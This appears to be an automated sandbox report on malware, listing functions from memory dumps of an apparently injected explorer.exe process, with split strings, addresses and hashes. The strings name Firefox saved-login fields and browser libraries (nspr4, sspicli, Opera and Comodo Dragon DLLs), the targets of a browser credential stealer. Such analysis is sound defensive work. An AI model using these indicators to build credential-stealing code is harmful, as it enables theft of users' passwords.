encr, xrefs: 1041989D
guid, xrefs: 104197CE
e, xrefs: 104198BD
dPas, xrefs: 104198E2
encr, xrefs: 104198D2
form, xrefs: 1041984D
itUR, xrefs: 1041985D
ypte, xrefs: 104198DA
ypte, xrefs: 104198A5
Subm, xrefs: 10419855
user, xrefs: 10419876
Fiel, xrefs: 10419884
swor, xrefs: 104198EA
d, xrefs: 104198F2
rnam, xrefs: 104198B5
dUse, xrefs: 104198AD
name, xrefs: 1041987D

Memory Dump Source

Source File: 00000008.00000002.3388937443.0000000010370000.00000040.80000000.00040000.00000000.sdmp, Offset: 10370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10370000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: 776bd2da3b57287e350556b2ddf57094cfb24cf2a24784b54e82d7397b5647f0
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: 7DB1AD34618B488EDB54DF68D486AEEB7F1FF98304F40451EE49ACB261EF34A445CB82

Function 0E877792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

user, xrefs: 0E877876
encr, xrefs: 0E8778D2
Fiel, xrefs: 0E877884
encr, xrefs: 0E87789D
e, xrefs: 0E8778BD
name, xrefs: 0E87787D
swor, xrefs: 0E8778EA
rnam, xrefs: 0E8778B5
ypte, xrefs: 0E8778A5
guid, xrefs: 0E8777CE
d, xrefs: 0E8778F2
Subm, xrefs: 0E877855
ypte, xrefs: 0E8778DA
itUR, xrefs: 0E87785D
form, xrefs: 0E87784D
dUse, xrefs: 0E8778AD
dPas, xrefs: 0E8778E2

Memory Dump Source

Source File: 00000008.00000002.3387480748.000000000E800000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e800000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: 6e164137f528ffd757c24bc80e47d69a1700de7dc5d81bc4d9ea7f5057c7c2f8
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: CAB13870618B488FDB55EF688485AEAB7E1FF98300F50491ED49AC7261EF70D905CB86

Function 0E5AA792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

itUR, xrefs: 0E5AA85D
ypte, xrefs: 0E5AA8A5
encr, xrefs: 0E5AA89D
ypte, xrefs: 0E5AA8DA
Subm, xrefs: 0E5AA855
Fiel, xrefs: 0E5AA884
rnam, xrefs: 0E5AA8B5
dUse, xrefs: 0E5AA8AD
name, xrefs: 0E5AA87D
e, xrefs: 0E5AA8BD
user, xrefs: 0E5AA876
swor, xrefs: 0E5AA8EA
dPas, xrefs: 0E5AA8E2
form, xrefs: 0E5AA84D
encr, xrefs: 0E5AA8D2
guid, xrefs: 0E5AA7CE
d, xrefs: 0E5AA8F2

Memory Dump Source

Source File: 00000008.00000002.3387086346.000000000E530000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e530000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: 578c4c1a19fd1f86fef8c72ecb49fbc6b9703e737098c79e5f0f8a795a34b46a
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: CFB18C30918B488EDB55EF68C485AEEB7F1FF98300F50491ED59AC7261EF709849CB86

Function 0E74B622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

l, xrefs: 0E74B6AC
d, xrefs: 0E74B67B
d, xrefs: 0E74B6A5
c, xrefs: 0E74B697
i, xrefs: 0E74B69E
w, xrefs: 0E74B6B3
d, xrefs: 0E74B6CF
n, xrefs: 0E74B6BA
p, xrefs: 0E74B690
t, xrefs: 0E74B6C8
s, xrefs: 0E74B689
2, xrefs: 0E74B674
u, xrefs: 0E74B661
l, xrefs: 0E74B6D6
l, xrefs: 0E74B682
e, xrefs: 0E74B66D
n, xrefs: 0E74B6C1

Memory Dump Source

Source File: 00000008.00000002.3387267397.000000000E660000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e660000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: 9172969835890398c8f5b6f66b427a3c3ba39417a4aec916292a79030d7c0d62
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: FA4190B0A18B08CFDF14DF88A8596AD7BE6FB48700F00025ED409D7255DBB5ED458BD6

Function 0BE37622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

n, xrefs: 0BE376BA
w, xrefs: 0BE376B3
s, xrefs: 0BE37689
d, xrefs: 0BE376A5
l, xrefs: 0BE37682
d, xrefs: 0BE3767B
p, xrefs: 0BE37690
i, xrefs: 0BE3769E
l, xrefs: 0BE376AC
e, xrefs: 0BE3766D
u, xrefs: 0BE37661
n, xrefs: 0BE376C1
d, xrefs: 0BE376CF
c, xrefs: 0BE37697
2, xrefs: 0BE37674
l, xrefs: 0BE376D6
t, xrefs: 0BE376C8

Memory Dump Source

Source File: 00000008.00000002.3383882525.000000000BD80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0BD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bd80000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: bb19b31c4d9b8f2692d2dc5668b3a217a2d3cdd042f0e5aea3174538c11cf4b8
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: 2941B1B0A18B088FDB14DF88A44A6BD7BE2FB48B04F00025ED849D3245DBB59D45CBD6

Function 10417622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

e, xrefs: 1041766D
p, xrefs: 10417690
c, xrefs: 10417697
w, xrefs: 104176B3
l, xrefs: 104176AC
d, xrefs: 104176A5
t, xrefs: 104176C8
u, xrefs: 10417661
l, xrefs: 104176D6
n, xrefs: 104176C1
i, xrefs: 1041769E
l, xrefs: 10417682
d, xrefs: 104176CF
2, xrefs: 10417674
n, xrefs: 104176BA
s, xrefs: 10417689
d, xrefs: 1041767B

Memory Dump Source

Source File: 00000008.00000002.3388937443.0000000010370000.00000040.80000000.00040000.00000000.sdmp, Offset: 10370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10370000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: 361079dd8d394b665962233f88f7e62946e78662d041eedb5c0cc8ae0d83d1d9
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: A6419270A18B088FDB14DF88A48A6AD7BF6FB48704F00025EE849D7345DB75AD858BD6

Function 0E875622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

c, xrefs: 0E875697
s, xrefs: 0E875689
i, xrefs: 0E87569E
l, xrefs: 0E8756D6
w, xrefs: 0E8756B3
d, xrefs: 0E8756CF
l, xrefs: 0E875682
n, xrefs: 0E8756C1
d, xrefs: 0E87567B
l, xrefs: 0E8756AC
2, xrefs: 0E875674
e, xrefs: 0E87566D
n, xrefs: 0E8756BA
t, xrefs: 0E8756C8
d, xrefs: 0E8756A5
u, xrefs: 0E875661
p, xrefs: 0E875690

Memory Dump Source

Source File: 00000008.00000002.3387480748.000000000E800000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e800000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: 5a9eb9c8437b5f04b83743f6b997d1bc94987a0dacf570ab6f7467fb737e6958
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: F041BD70A18B08CFDB14DF98A4466AE7BE2FB88B00F00025EE849D7255DBB5DD458BD6

Function 0E5A8622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

l, xrefs: 0E5A86AC
i, xrefs: 0E5A869E
p, xrefs: 0E5A8690
u, xrefs: 0E5A8661
l, xrefs: 0E5A8682
t, xrefs: 0E5A86C8
d, xrefs: 0E5A86A5
c, xrefs: 0E5A8697
n, xrefs: 0E5A86C1
l, xrefs: 0E5A86D6
e, xrefs: 0E5A866D
s, xrefs: 0E5A8689
2, xrefs: 0E5A8674
d, xrefs: 0E5A867B
n, xrefs: 0E5A86BA
d, xrefs: 0E5A86CF
w, xrefs: 0E5A86B3

Memory Dump Source

Source File: 00000008.00000002.3387086346.000000000E530000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e530000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: 2586ab71102c573964d3d701658fff5f855bccf4aed222cf850f975dc2433bd9
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: AD41B170A18B088FDB18DF88A84A6BD7BE2FB88700F04465ED509D3245DBB59D45CBD6

Function 0E752AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

c, xrefs: 0E752C0B
l, xrefs: 0E752C35
[, xrefs: 0E752C2D
[, xrefs: 0E752C90
], xrefs: 0E752C3D
D, xrefs: 0E752CDA
n, xrefs: 0E752C98
[, xrefs: 0E752C66
l, xrefs: 0E752CE2
b, xrefs: 0E752C73
[, xrefs: 0E752CCD
[, xrefs: 0E752BF6
e, xrefs: 0E752CA0
], xrefs: 0E752CA8

Memory Dump Source

Source File: 00000008.00000002.3387267397.000000000E660000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e660000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: 99be24ee6a30a88bbb39bb5b1226df197a785fb44492565600f9fc533b8da324
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: 0AC18C71218B099FC758EF24C4996EAF3E1FB94304F404B2E999EC7220DF70A915CB86

Function 0BE3EAB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

[, xrefs: 0BE3EBF6
[, xrefs: 0BE3EC66
c, xrefs: 0BE3EC0B
n, xrefs: 0BE3EC98
], xrefs: 0BE3EC3D
[, xrefs: 0BE3EC90
l, xrefs: 0BE3EC35
l, xrefs: 0BE3ECE2
[, xrefs: 0BE3ECCD
D, xrefs: 0BE3ECDA
b, xrefs: 0BE3EC73
[, xrefs: 0BE3EC2D
e, xrefs: 0BE3ECA0
], xrefs: 0BE3ECA8

Memory Dump Source

Source File: 00000008.00000002.3383882525.000000000BD80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0BD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bd80000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: 543b2493e7b5ea46be3a804bc03beb8571297451968e1b1fed343f7caeddbc25
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: AFC18B70618B089FC758EF24D49AAAAF3E1FF98704F40572E949AC7200DF30E515CB86

Function 1041EAB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

[, xrefs: 1041EC66
], xrefs: 1041EC3D
e, xrefs: 1041ECA0
[, xrefs: 1041EBF6
c, xrefs: 1041EC0B
D, xrefs: 1041ECDA
], xrefs: 1041ECA8
b, xrefs: 1041EC73
l, xrefs: 1041EC35
l, xrefs: 1041ECE2
n, xrefs: 1041EC98
[, xrefs: 1041ECCD
[, xrefs: 1041EC2D
[, xrefs: 1041EC90

Memory Dump Source

Source File: 00000008.00000002.3388937443.0000000010370000.00000040.80000000.00040000.00000000.sdmp, Offset: 10370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10370000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: 7d5af5856be42b7cc68e4b45bbbd2fbd80cbc4b53701054080d5da4bf1581203
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: 32C15A78618B099FC758EF64D4C6AAAF3E1FB94304F40472EA49AC7210DF34B555CB86

Function 0E87CAB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

[, xrefs: 0E87CC66
D, xrefs: 0E87CCDA
e, xrefs: 0E87CCA0
[, xrefs: 0E87CBF6
c, xrefs: 0E87CC0B
l, xrefs: 0E87CCE2
n, xrefs: 0E87CC98
l, xrefs: 0E87CC35
], xrefs: 0E87CCA8
b, xrefs: 0E87CC73
[, xrefs: 0E87CC2D
[, xrefs: 0E87CCCD
[, xrefs: 0E87CC90
], xrefs: 0E87CC3D

Memory Dump Source

Source File: 00000008.00000002.3387480748.000000000E800000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e800000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: ec710b7ea78c5f3ac99d16027dac7a2de89441d053988c184f487a8684993a22
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: F9C15B71218B098FC758EF68C4956EAF7E5FB98304F404A2E959AC7250DF30E915CB86

Function 0E5AFAB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

], xrefs: 0E5AFCA8
e, xrefs: 0E5AFCA0
b, xrefs: 0E5AFC73
[, xrefs: 0E5AFC2D
[, xrefs: 0E5AFC90
[, xrefs: 0E5AFBF6
l, xrefs: 0E5AFCE2
], xrefs: 0E5AFC3D
D, xrefs: 0E5AFCDA
n, xrefs: 0E5AFC98
[, xrefs: 0E5AFCCD
l, xrefs: 0E5AFC35
c, xrefs: 0E5AFC0B
[, xrefs: 0E5AFC66

Memory Dump Source

Source File: 00000008.00000002.3387086346.000000000E530000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e530000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: 2123a2aab0c008abb6262c0cef1decbbc9d723d4036a18650bec00822ba52fc8
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: 9BC16D74218B099FC758EF24C495AEAF3E1FB98304F404B2E969EC7250DF70A915CB96

Function 0E752F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

c, xrefs: 0E752FC8
n, xrefs: 0E752F6B
r, xrefs: 0E752FB0
r, xrefs: 0E752F90
0, xrefs: 0E752F5B
., xrefs: 0E752F63
r, xrefs: 0E752F88
r, xrefs: 0E752FC0
r, xrefs: 0E752FA8
r, xrefs: 0E752FA0
r, xrefs: 0E752F98
r, xrefs: 0E752FB8

Memory Dump Source

Source File: 00000008.00000002.3387267397.000000000E660000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e660000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: 240869166b47607099842de2159b5262793d2aa3d6479305220a8659b72a4c03
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: 4A51E4312187488FD719DF18D4852AAB7E5FBC5300F501A2EE8CBC7366DBB49946CB82

Function 0BE3EF12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

., xrefs: 0BE3EF63
r, xrefs: 0BE3EFB0
0, xrefs: 0BE3EF5B
r, xrefs: 0BE3EF90
r, xrefs: 0BE3EFA0
c, xrefs: 0BE3EFC8
n, xrefs: 0BE3EF6B
r, xrefs: 0BE3EF88
r, xrefs: 0BE3EF98
r, xrefs: 0BE3EFB8
r, xrefs: 0BE3EFA8
r, xrefs: 0BE3EFC0

Memory Dump Source

Source File: 00000008.00000002.3383882525.000000000BD80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0BD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bd80000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: d2979fafb252c27845538cdd5ab2d4a40d7aac8069c911d475a6a6d5ac80f4a0
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: 0451E63151C7488FD719DF18D4852AAB7E5FBC5704F502A2EE8CBC7242DBB49946CB82

Function 1041EF12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

., xrefs: 1041EF63
n, xrefs: 1041EF6B
r, xrefs: 1041EFB0
r, xrefs: 1041EFC0
r, xrefs: 1041EF90
r, xrefs: 1041EF98
r, xrefs: 1041EF88
r, xrefs: 1041EFA8
r, xrefs: 1041EFB8
r, xrefs: 1041EFA0
0, xrefs: 1041EF5B
c, xrefs: 1041EFC8

Memory Dump Source

Source File: 00000008.00000002.3388937443.0000000010370000.00000040.80000000.00040000.00000000.sdmp, Offset: 10370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10370000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: b865260280737bddb845a448c01972df1135cf5c80232abaa984b7d6b7098ac7
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: 2051D7746187488FD709CF14D4C12AAB7E5FB85704F50192EF8CBC7252DBB8A946CB82

Function 0E87CF12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

., xrefs: 0E87CF63
c, xrefs: 0E87CFC8
0, xrefs: 0E87CF5B
r, xrefs: 0E87CF88
r, xrefs: 0E87CFA0
r, xrefs: 0E87CF90
n, xrefs: 0E87CF6B
r, xrefs: 0E87CFA8
r, xrefs: 0E87CFB0
r, xrefs: 0E87CFC0
r, xrefs: 0E87CF98
r, xrefs: 0E87CFB8

Memory Dump Source

Source File: 00000008.00000002.3387480748.000000000E800000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e800000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: 33b8d353734c39a515de779eecae6abf2bf6e888ae7f7ed2e075162859461520
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: F951C1312187488FD719DF18D8816AAB7E5FF85704F501A2EE8CBC7291DBB4D946CB82

Function 0E5AFF12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

r, xrefs: 0E5AFF98
0, xrefs: 0E5AFF5B
r, xrefs: 0E5AFFA8
c, xrefs: 0E5AFFC8
., xrefs: 0E5AFF63
r, xrefs: 0E5AFFC0
r, xrefs: 0E5AFFB8
r, xrefs: 0E5AFFB0
n, xrefs: 0E5AFF6B
r, xrefs: 0E5AFF90
r, xrefs: 0E5AFFA0
r, xrefs: 0E5AFF88

Memory Dump Source

Source File: 00000008.00000002.3387086346.000000000E530000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e530000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: 174651b84846b0a60ecb11dc3dfc0fa53799f50df720544d78b1300a15e9d6d5
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: EB51B1316187488FD719DF18C8912EAB7E5FBC5700F501E2EE9CB87252DBB49906CB82

Function 0E74C2F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

opera_browser.dll, xrefs: 0E74C629
sspi, xrefs: 0E74C320
nspr, xrefs: 0E74C4D4
4.dl, xrefs: 0E74C4DB
dragon_s.dll, xrefs: 0E74C614
dll, xrefs: 0E74C32E
l, xrefs: 0E74C4E2
cli., xrefs: 0E74C327

Memory Dump Source

Source File: 00000008.00000002.3387267397.000000000E660000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e660000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: 57a28d1c10e90e1871cca0362bc359c05d0c09627e1a37f6dcb0650e69b3ea3d
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: 5EC1B171618A198FC758EF68C459AAAF3E1FB98300F50472D984AC7265DF70DE02CBC6

Function 0E74C2F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

opera_browser.dll, xrefs: 0E74C629
sspi, xrefs: 0E74C320
nspr, xrefs: 0E74C4D4
4.dl, xrefs: 0E74C4DB
dragon_s.dll, xrefs: 0E74C614
dll, xrefs: 0E74C32E
l, xrefs: 0E74C4E2
cli., xrefs: 0E74C327

Memory Dump Source

Source File: 00000008.00000002.3387267397.000000000E660000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e660000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: eba47bac1b117225c38364bf3b896e78b22e0f97b37c6690f837f11d75d3882c
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: 46C1A271618A198FC758EF68C459AAAF3E1FB98300F50472D984AC7265DF70DE02CBC5

Function 0BE382F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

4.dl, xrefs: 0BE384DB
l, xrefs: 0BE384E2
dragon_s.dll, xrefs: 0BE38614
sspi, xrefs: 0BE38320
opera_browser.dll, xrefs: 0BE38629
cli., xrefs: 0BE38327
dll, xrefs: 0BE3832E
nspr, xrefs: 0BE384D4

Memory Dump Source

Source File: 00000008.00000002.3383882525.000000000BD80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0BD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bd80000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: 0374aebefc9b529823564e402e4bc6e308f6f8eaafdf310090cc4f0d8e2fb18e
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: 2DC19070618A194FCB58EF68D49AAAAB3E1FF98704F505329940ED7251DF30EA41CBC6

Function 0BE382F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

4.dl, xrefs: 0BE384DB
l, xrefs: 0BE384E2
dragon_s.dll, xrefs: 0BE38614
sspi, xrefs: 0BE38320
opera_browser.dll, xrefs: 0BE38629
cli., xrefs: 0BE38327
dll, xrefs: 0BE3832E
nspr, xrefs: 0BE384D4

Memory Dump Source

Source File: 00000008.00000002.3383882525.000000000BD80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0BD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bd80000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: 7cf69053aef5829a83dc10fcfd139835afa1b7b68e07803cb74198c37f0c5a74
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: 37C1B070618A194FCB58EF68D45AAAAF3E1FF98704F505329940ED7251DF30EA41CBC6

Function 104182F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

l, xrefs: 104184E2
nspr, xrefs: 104184D4
cli., xrefs: 10418327
dll, xrefs: 1041832E
4.dl, xrefs: 104184DB
opera_browser.dll, xrefs: 10418629
dragon_s.dll, xrefs: 10418614
sspi, xrefs: 10418320

Memory Dump Source

Source File: 00000008.00000002.3388937443.0000000010370000.00000040.80000000.00040000.00000000.sdmp, Offset: 10370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10370000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: 50b7e68087999628bf05393ec69e17e64d15f5151cf1a113097ec167bee7ea6d
